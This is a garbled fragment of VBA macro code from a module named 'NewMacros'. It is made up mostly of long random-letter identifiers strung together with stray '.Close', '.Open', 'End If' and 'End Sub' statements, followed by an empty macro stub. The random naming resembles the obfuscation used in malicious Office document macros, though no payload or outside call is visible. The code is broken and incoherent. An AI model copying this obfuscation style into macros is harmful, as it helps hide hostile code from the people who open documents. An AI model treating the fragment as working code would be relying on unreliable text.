DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Close End If CXCQXWFHIEQXUMDFODFMRCJCVJUTIYHZCPCIFOMXJURPUELVPUGDSTJTVZUKPPORDGKYFFNPQMYGDULMWLNUSKQEERVCPZPCKXKQNWNYRWZXDLTWXCOLBBRUEIDSQQQSLORZNNVQRNZOEDTOYTOVBSSMMZEKXIXJSYSROXVHYFHGLTUFGKWNCJZDMQLBYY.Open (YEPGUDSVGKEURSRTMJMCPIPRSOBPFXUPZUQWCTTNGTFLSJRLNZTSPYXJTGJHMOVGHMQODLUEOLGVZBZCURUKQQXZBWJRNFWXIVYFKUCVOCNMBRZTVIVBXHGQCOKIOWEOINYWLMDMPTOEIIIKVYDSYXGIJFRZVNFGQEHNMDKWWKOUJSIUDQEJGPHSKPSQWFM) End Sub Attribute VB_Name = "NewMacros" Sub macro() ' ' macro Macro ' ' End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.